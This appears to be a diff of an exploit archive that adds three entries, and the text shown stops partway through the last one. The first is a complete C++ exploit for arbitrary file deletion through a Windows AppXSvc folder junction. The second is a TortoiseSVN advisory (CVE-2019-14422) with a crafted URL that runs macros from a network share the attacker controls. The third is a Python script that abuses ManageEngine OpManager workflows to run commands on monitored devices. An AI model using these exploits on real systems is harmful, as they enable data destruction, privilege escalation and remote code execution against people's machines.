exploits/windows/local/47253.cpp
Normal file
|
@ -0,0 +1,244 @@
|
||||||
|
/*
|
||||||
|
# Author : Abdelhamid Naceri
|
||||||
|
# Discovered On : 13/08/2019
|
||||||
|
# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
|
||||||
|
Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
|
||||||
|
from a low integrity user .
|
||||||
|
# Still Unpatched On 13/08/2019
|
||||||
|
Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
|
||||||
|
*/
|
||||||
|
#include"windows.h"
|
||||||
|
#include"iostream"
|
||||||
|
#include"conio.h"
|
||||||
|
#include"stdio.h"
|
||||||
|
#include"tlhelp32.h"
|
||||||
|
#include"cstdio"
|
||||||
|
#include"wchar.h"
|
||||||
|
#include"process.h"
|
||||||
|
#include"wchar.h"
|
||||||
|
#include"string"
|
||||||
|
#include"tchar.h"
|
||||||
|
|
||||||
|
#pragma warning(disable : 4996)
|
||||||
|
#pragma comment(lib, "advapi32.lib")
|
||||||
|
#ifndef UNICODE
|
||||||
|
typedef std::string String;
|
||||||
|
#else
|
||||||
|
typedef std::wstring String;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
using namespace std;
|
||||||
|
|
||||||
|
bool FileExists(const wchar_t* file) {
|
||||||
|
if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND)
|
||||||
|
{
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
void remove_dir(const wchar_t* folder)
|
||||||
|
{
|
||||||
|
std::wstring search_path = std::wstring(folder) + _T("/*.*");
|
||||||
|
std::wstring s_p = std::wstring(folder) + _T("/");
|
||||||
|
WIN32_FIND_DATA fd;
|
||||||
|
HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd);
|
||||||
|
if (hFind != INVALID_HANDLE_VALUE) {
|
||||||
|
do {
|
||||||
|
if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
|
||||||
|
if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0)
|
||||||
|
{
|
||||||
|
remove_dir((wchar_t*)(s_p + fd.cFileName).c_str());
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
DeleteFile((s_p + fd.cFileName).c_str());
|
||||||
|
}
|
||||||
|
} while (::FindNextFile(hFind, &fd));
|
||||||
|
::FindClose(hFind);
|
||||||
|
_wrmdir(folder);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
void killProcessByName(const wchar_t* filename)
|
||||||
|
{
|
||||||
|
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
|
||||||
|
PROCESSENTRY32 pEntry;
|
||||||
|
pEntry.dwSize = sizeof(pEntry);
|
||||||
|
BOOL hRes = Process32First(hSnapShot, &pEntry);
|
||||||
|
while (hRes)
|
||||||
|
{
|
||||||
|
if (wcscmp(pEntry.szExeFile, filename) == 0)
|
||||||
|
{
|
||||||
|
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
|
||||||
|
(DWORD)pEntry.th32ProcessID);
|
||||||
|
if (hProcess != NULL)
|
||||||
|
{
|
||||||
|
TerminateProcess(hProcess, 9);
|
||||||
|
CloseHandle(hProcess);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
hRes = Process32Next(hSnapShot, &pEntry);
|
||||||
|
}
|
||||||
|
CloseHandle(hSnapShot);
|
||||||
|
}
|
||||||
|
|
||||||
|
bool IsProcessRunning(const wchar_t* processName)
|
||||||
|
{
|
||||||
|
bool exists = false;
|
||||||
|
PROCESSENTRY32 entry;
|
||||||
|
entry.dwSize = sizeof(PROCESSENTRY32);
|
||||||
|
|
||||||
|
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
|
||||||
|
|
||||||
|
if (Process32First(snapshot, &entry))
|
||||||
|
while (Process32Next(snapshot, &entry))
|
||||||
|
if (!_wcsicmp(entry.szExeFile, processName))
|
||||||
|
exists = true;
|
||||||
|
|
||||||
|
CloseHandle(snapshot);
|
||||||
|
return exists;
|
||||||
|
}
|
||||||
|
|
||||||
|
bool dirExists(const std::string& dirName_in)
|
||||||
|
{
|
||||||
|
DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
|
||||||
|
if (ftyp == INVALID_FILE_ATTRIBUTES)
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
|
||||||
|
return true;
|
||||||
|
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
void KillEdge()
|
||||||
|
{
|
||||||
|
killProcessByName(L"MicrosoftEdge.exe");
|
||||||
|
}
|
||||||
|
|
||||||
|
void StartEdge()
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
system("start microsoft-edge:");
|
||||||
|
}
|
||||||
|
catch (...){}
|
||||||
|
}
|
||||||
|
|
||||||
|
void exploit(const char* path) {
|
||||||
|
//Inintializing the variable before begining
|
||||||
|
int attempt = 0;
|
||||||
|
string command;
|
||||||
|
wchar_t* userprofile = _wgetenv(L"USERPROFILE");
|
||||||
|
const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
|
||||||
|
//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
|
||||||
|
//I deleted him first
|
||||||
|
const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
|
||||||
|
wstring froamingpath(userprofile);
|
||||||
|
froamingpath += wstring(roamingpath);
|
||||||
|
wstring fullpath(userprofile);
|
||||||
|
fullpath += std::wstring(relpath);
|
||||||
|
wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
|
||||||
|
wstring fpath(szBuffsrc);
|
||||||
|
string strfpath(fpath.begin(), fpath.end());
|
||||||
|
//Check If MS-Edge Need To Write DACL Or Not
|
||||||
|
|
||||||
|
if (dirExists(strfpath) != true) {
|
||||||
|
printf("[!] Wait MS-Edge Need To Write The DACL");
|
||||||
|
StartEdge();
|
||||||
|
for (;;) {
|
||||||
|
Sleep(1000);
|
||||||
|
if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
|
||||||
|
}
|
||||||
|
StartEdge();
|
||||||
|
Sleep(7000);
|
||||||
|
KillEdge();
|
||||||
|
printf("\r ");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//End Of Check
|
||||||
|
printf("\r# Author : Abdelhamid Naceri\n");
|
||||||
|
printf("# Tested On Windows 10 32&64bit\n");
|
||||||
|
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
|
||||||
|
printf("[+] Checking If Path Exist ...");
|
||||||
|
Sleep(2000);
|
||||||
|
if (dirExists(path) != true) {
|
||||||
|
printf("Your Path Is Invalid");
|
||||||
|
ExitProcess(EXIT_FAILURE); }
|
||||||
|
else {
|
||||||
|
printf("Exist !\n");
|
||||||
|
KillEdge();
|
||||||
|
printf("[+] Starting MS-Edge ...\n");
|
||||||
|
StartEdge();
|
||||||
|
Sleep(4000);
|
||||||
|
printf("[+] Killing MS-Edge ...\n");
|
||||||
|
KillEdge();
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Wipping MS-Edge Directory ...\n");
|
||||||
|
killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
|
||||||
|
remove_dir(roamingpath);
|
||||||
|
remove_dir(szBuffsrc);
|
||||||
|
Sleep(2000);
|
||||||
|
remove_dir(szBuffsrc);
|
||||||
|
printf("[+] Checking If Directory Exist Anymore ...");
|
||||||
|
if (dirExists(strfpath) == true) {
|
||||||
|
|
||||||
|
if (dirExists(strfpath) == true) {
|
||||||
|
printf("Something Went Wrong");
|
||||||
|
printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
|
||||||
|
command = "explorer ";
|
||||||
|
command.append(strfpath);
|
||||||
|
system(command.c_str());
|
||||||
|
_getch();
|
||||||
|
goto Continue;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
Continue:
|
||||||
|
printf(" Done\n");
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Attempting to Create Junction To Target ...\n");
|
||||||
|
command = "mklink /J ";
|
||||||
|
command.append("\"");
|
||||||
|
command.append(strfpath);
|
||||||
|
command.append("\"");
|
||||||
|
command.append(" ");
|
||||||
|
command.append("\"");
|
||||||
|
command.append(path);
|
||||||
|
command.append("\"");
|
||||||
|
system(command.c_str());
|
||||||
|
printf("Done\n");
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Firing Up MS-Edge Again ...\n");
|
||||||
|
StartEdge();
|
||||||
|
do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe"));
|
||||||
|
Sleep(3000);
|
||||||
|
StartEdge();
|
||||||
|
command = "explorer ";
|
||||||
|
command.append(path);
|
||||||
|
printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
|
||||||
|
system(command.c_str());
|
||||||
|
printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
|
||||||
|
_getch();
|
||||||
|
printf("Cleaning ...");
|
||||||
|
_wremove(szBuffsrc);
|
||||||
|
_wrmdir(szBuffsrc);
|
||||||
|
ExitProcess(EXIT_SUCCESS);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char* argv[]) {
|
||||||
|
if (argc == 2) {exploit(argv[1]);}
|
||||||
|
else {
|
||||||
|
printf("# Author : Abdelhamid Naceri\n");
|
||||||
|
printf("# Tested On Windows 10 1903 32&64bit\n");
|
||||||
|
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
|
||||||
|
printf("[!] Usage : poc.exe TargetPath");
|
||||||
|
}
|
||||||
|
return EXIT_SUCCESS;
|
||||||
|
}
|
194
exploits/windows/webapps/47252.txt
Normal file
194
exploits/windows/webapps/47252.txt
Normal file
|
@ -0,0 +1,194 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2188
|
||||||
|
|
||||||
|
Product:
|
||||||
|
https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
|
||||||
|
|
||||||
|
Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
|
||||||
|
|
||||||
|
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422
|
||||||
|
|
||||||
|
CVE-ID:
|
||||||
|
=======
|
||||||
|
CVE-2019-14422
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2019-08-13
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
2188
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
8.8
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Class:
|
||||||
|
====================
|
||||||
|
Code Execution
|
||||||
|
|
||||||
|
|
||||||
|
Current Estimated Price:
|
||||||
|
========================
|
||||||
|
4.000€ - 5.000€
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
TortoiseSVN is a really easy to use Revision control / version control /
|
||||||
|
source control software for Windows.
|
||||||
|
It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
|
||||||
|
easy user interface for Subversion.
|
||||||
|
It is developed under the GPL. Which means it is completely free for
|
||||||
|
anyone to use, including in a commercial
|
||||||
|
environment, without any restriction. The source code is also freely
|
||||||
|
available, so you can even develop your
|
||||||
|
own version if you wish to. Since it's not an integration for a specific
|
||||||
|
IDE like Visual Studio, Eclipse or
|
||||||
|
others, you can use it with whatever development tools you like, and
|
||||||
|
with any type of file.
|
||||||
|
|
||||||
|
(Copy of the about page: https://tortoisesvn.net/about.html )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
A vulnerability laboratory researcher (vxrl team) discovered a remote
|
||||||
|
code execution vulnerability in the TortoiseSVN v1.12.1 software.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2019-08-13: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
TortoiseSVN
|
||||||
|
Product: TortoiseSVN - Software 1.12.1
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Authentication Type:
|
||||||
|
====================
|
||||||
|
Pre auth - no privileges
|
||||||
|
|
||||||
|
|
||||||
|
User Interaction:
|
||||||
|
=================
|
||||||
|
Low User Interaction
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Type:
|
||||||
|
================
|
||||||
|
Independent Security Research
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A remote code execution vulnerability has been uncovered in the official
|
||||||
|
TortoiseSVN v1.12.1 software.
|
||||||
|
The vulnerability typ allows remote attackers to execute arbitrary codes
|
||||||
|
to compromise a target computer system.
|
||||||
|
|
||||||
|
The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
|
||||||
|
operation on Excel workbooks, which could be used to open remote
|
||||||
|
workbooks without protection from macro security settings to execute
|
||||||
|
arbitrary code.
|
||||||
|
|
||||||
|
The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
|
||||||
|
customised diff on [file1] and [file2] based on the file extension.
|
||||||
|
For xls files, it will execute the script `diff-xls.js` using wscript,
|
||||||
|
which will open the two files for analysis without any macro
|
||||||
|
security warning. An attacker can exploit this by putting a macro virus
|
||||||
|
in a network drive, and force the victim to open the workbooks
|
||||||
|
and execute the macro inside. Since the macro is triggered through
|
||||||
|
wscript, to make the attack less visible, one could kill the wscript
|
||||||
|
process and quit the excel program after the code was executed.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The vulnerability could be triggered by visiting a specially crafted URL
|
||||||
|
via web browser.
|
||||||
|
To reproduce the vulnerability, one could simply create a .url file or
|
||||||
|
open the URL with a browsers,
|
||||||
|
but a notification prompt may be shown for the latter case.
|
||||||
|
|
||||||
|
<a
|
||||||
|
href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout
|
||||||
|
the Repo with TortoiseSVN</a>
|
||||||
|
|
||||||
|
where VBoxSvrv is the remote network drive controlled by the attacker,
|
||||||
|
v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
|
||||||
|
|
||||||
|
Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
|
||||||
|
Password: 23vxrl23
|
||||||
|
|
||||||
|
PoC: Video
|
||||||
|
https://www.youtube.com/watch?v=spvRSC377vI
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the remote code execution vulnerability in the
|
||||||
|
software component is estimated as high.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
PingFanZettaKe [VXRL Team] -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without
|
||||||
|
any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability
|
||||||
|
and capability for a particular purpose. Vulnerability-Lab
|
||||||
|
or its suppliers are not liable in any case of damage, including direct,
|
||||||
|
indirect, incidental, consequential loss of business profits
|
||||||
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||||
|
advised of the possibility of such damages. Some states do
|
||||||
|
not allow the exclusion or limitation of liability for consequential or
|
||||||
|
incidental damages so the foregoing limitation may not apply.
|
||||||
|
We do not approve or encourage anybody to break any licenses, policies,
|
||||||
|
deface websites, hack into databases or trade with stolen data.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||||
|
www.vulnerability-db.com
|
||||||
|
Services: magazine.vulnerability-lab.com
|
||||||
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||||
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||||
|
youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php
|
||||||
|
vulnerability-lab.com/rss/rss_upcoming.php
|
||||||
|
vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php
|
||||||
|
vulnerability-lab.com/register.php
|
||||||
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
266
exploits/windows/webapps/47255.py
Executable file
266
exploits/windows/webapps/47255.py
Executable file
|
@ -0,0 +1,266 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# Exploit Title: ManageEngine opManager Authenticated Code Execution
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 08/13/2019
|
||||||
|
# Exploit Author: @kindredsec
|
||||||
|
# Vendor Homepage: https://www.manageengine.com/
|
||||||
|
# Software Link: https://www.manageengine.com/network-monitoring/download.html
|
||||||
|
# Version: 12.3.150
|
||||||
|
# Tested on: Windows Server 2016
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
import random
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
import string
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
C_WHITE = '\033[1;37m'
|
||||||
|
C_BLUE = '\033[1;34m'
|
||||||
|
C_GREEN = '\033[1;32m'
|
||||||
|
C_YELLOW = '\033[1;33m'
|
||||||
|
C_RED = '\033[1;31m'
|
||||||
|
C_RESET = '\033[0m'
|
||||||
|
LOGIN_FAIL_MSG = "Invalid username and/or password."
|
||||||
|
|
||||||
|
def buildRandomString(length=10):
|
||||||
|
letters = string.ascii_lowercase
|
||||||
|
return ''.join(random.choice(letters) for i in range(length))
|
||||||
|
|
||||||
|
|
||||||
|
def getSessionData(target, user, password):
|
||||||
|
|
||||||
|
session = requests.Session()
|
||||||
|
session.get(target)
|
||||||
|
|
||||||
|
# Login Sequence
|
||||||
|
randSid = random.uniform(-1,1)
|
||||||
|
getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
|
||||||
|
postData = { "eraseAutoLoginCookie" : "true" }
|
||||||
|
session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )
|
||||||
|
|
||||||
|
postData = { "loginFromCookieData" : "false",
|
||||||
|
"ntlmv2" : "false",
|
||||||
|
"j_username" : user,
|
||||||
|
"j_password" : password
|
||||||
|
}
|
||||||
|
initialAuth = session.post( url = target + "/j_security_check", data = postData )
|
||||||
|
|
||||||
|
|
||||||
|
if LOGIN_FAIL_MSG in initialAuth.text:
|
||||||
|
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
elif initialAuth.status_code != 200:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
|
||||||
|
apiKey = apiKeyReg.group(0).split('"')[1]
|
||||||
|
|
||||||
|
return { "session" : session , "apiKey" : apiKey }
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def getDeviceList(target, session, apiKey):
|
||||||
|
|
||||||
|
deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )
|
||||||
|
|
||||||
|
devices = {}
|
||||||
|
devicesJsonParsed = json.loads(deviceList.text)
|
||||||
|
for row in devicesJsonParsed["rows"]:
|
||||||
|
devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]
|
||||||
|
|
||||||
|
return devices
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def buildTaskWindows(target, session, apiKey, device, command):
|
||||||
|
|
||||||
|
# Build Task
|
||||||
|
taskName = buildRandomString()
|
||||||
|
workFlowName = buildRandomString(15)
|
||||||
|
|
||||||
|
jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
|
||||||
|
jsonData += '"' + taskName + '"'
|
||||||
|
jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":"""
|
||||||
|
jsonData += '"' + command + '"'
|
||||||
|
jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
|
||||||
|
jsonData += '"' + workFlowName + '"'
|
||||||
|
jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
|
||||||
|
jsonData += '"' + device + '"'
|
||||||
|
jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
|
||||||
|
jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
|
||||||
|
jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
|
||||||
|
|
||||||
|
makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
|
||||||
|
|
||||||
|
if "has been created successfully" in makeWorkFlow.text:
|
||||||
|
print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
|
||||||
|
else:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
return workFlowName
|
||||||
|
|
||||||
|
|
||||||
|
def buildTaskLinux(target, session, apiKey, device, command):
|
||||||
|
|
||||||
|
taskName = buildRandomString()
|
||||||
|
workFlowName = buildRandomString(15)
|
||||||
|
|
||||||
|
jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
|
||||||
|
jsonData += '"' + taskName + '"'
|
||||||
|
jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":"""
|
||||||
|
jsonData += '"' + command + '"'
|
||||||
|
jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
|
||||||
|
jsonData += '"' + workFlowName + '"'
|
||||||
|
jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
|
||||||
|
jsonData += '"' + device + '"'
|
||||||
|
jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
|
||||||
|
jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
|
||||||
|
jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
|
||||||
|
|
||||||
|
makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
|
||||||
|
|
||||||
|
if "has been created successfully" in makeWorkFlow.text:
|
||||||
|
print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
|
||||||
|
else:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
return workFlowName
|
||||||
|
|
||||||
|
|
||||||
|
# Get the ID of the newly created workflow
|
||||||
|
def getWorkflowID(target, session, apiKey, workflowName):
|
||||||
|
|
||||||
|
getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })
|
||||||
|
|
||||||
|
rbID = -100
|
||||||
|
workflowJsonParsed = json.loads(getID.text)
|
||||||
|
for wf in workflowJsonParsed:
|
||||||
|
if wf['name'] == workflowName:
|
||||||
|
rbID = wf['rbID']
|
||||||
|
|
||||||
|
if rbID == -100:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
return rbID
|
||||||
|
|
||||||
|
|
||||||
|
def getDeviceID(target, session, apiKey, rbID, device):
|
||||||
|
|
||||||
|
getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
|
||||||
|
wfDevicesJsonParsed = json.loads(getDevices.text)
|
||||||
|
wfDevices = wfDevicesJsonParsed["defaultDevices"]
|
||||||
|
deviceID = list(wfDevices.keys())[0]
|
||||||
|
|
||||||
|
return deviceID
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def runWorkflow(target, session, apiKey, rbID, device):
|
||||||
|
|
||||||
|
targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
|
||||||
|
|
||||||
|
print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
|
||||||
|
workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 } )
|
||||||
|
|
||||||
|
if re.match(r"^\[.*\]$", workflowExec.text.strip()):
|
||||||
|
print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
|
||||||
|
else:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
deleteWorkflow(target, session, apiKey, rbID)
|
||||||
|
print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")
|
||||||
|
|
||||||
|
|
||||||
|
def deleteWorkflow(target, session, apiKey, rbID):
|
||||||
|
|
||||||
|
print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
|
||||||
|
delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
|
||||||
|
parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
|
||||||
|
parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
|
||||||
|
parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
|
||||||
|
parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
insufficient_args = False
|
||||||
|
if not args.u:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
|
||||||
|
insufficient_args = True
|
||||||
|
if not args.t:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
|
||||||
|
insufficient_args = True
|
||||||
|
if not args.p:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
|
||||||
|
insufficient_args = True
|
||||||
|
if not args.c:
|
||||||
|
print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
|
||||||
|
insufficient_args = True
|
||||||
|
|
||||||
|
if insufficient_args:
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
|
||||||
|
sessionDat = getSessionData(args.t, args.u, args.p)
|
||||||
|
session = sessionDat["session"]
|
||||||
|
apiKey = sessionDat["apiKey"]
|
||||||
|
|
||||||
|
devices = getDeviceList(args.t, session, apiKey)
|
||||||
|
|
||||||
|
# if there's only one device in the OpManager instance, default to running commands on that device;
|
||||||
|
# no need to ask the user.
|
||||||
|
if len(devices.keys()) == 1:
|
||||||
|
device = list(devices.keys())[0]
|
||||||
|
else:
|
||||||
|
print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
|
||||||
|
print("")
|
||||||
|
